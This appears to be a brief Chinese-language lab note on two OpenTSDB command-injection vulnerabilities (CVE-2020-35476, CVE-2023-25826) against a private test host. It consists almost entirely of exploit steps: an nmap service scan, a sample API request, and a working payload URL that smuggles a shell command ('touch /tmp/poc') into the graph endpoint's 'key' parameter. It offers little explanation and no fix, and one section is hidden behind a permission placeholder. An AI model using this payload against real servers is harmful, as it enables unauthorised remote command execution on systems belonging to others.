(CVE-2020-35476)(CVE-2023-25826)
OpenTSDB 命令注入漏洞(CVE-2020-35476)
信息收集:nmap 192.168.85.130 -p 4242 -sV
您没有 权限 查看此处内容!
OpenTSDB 命令注入漏洞(CVE-2023-25826)
POST /api/put/ HTTP/1.1;Content-Type: application/x-www-form-urlencoded;{ “metric”: “sys.cpu.nice”, “timestamp”: 1346846400, “value”: 20, “tags”: { “host”: “web01”, “dc”: “lga” } }
url:http://192.168.85.130:4242/api/suggest?type=metrics&q=&max=10
payload:http://192.168.85.130:4242/q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=1&xrange=&y2range=[42:42]&key=%3Bsystem%20%22touch%20/tmp/poc%22%20%22&wxh=1516×644&style=linespoint&baba=lala&grid=t&json
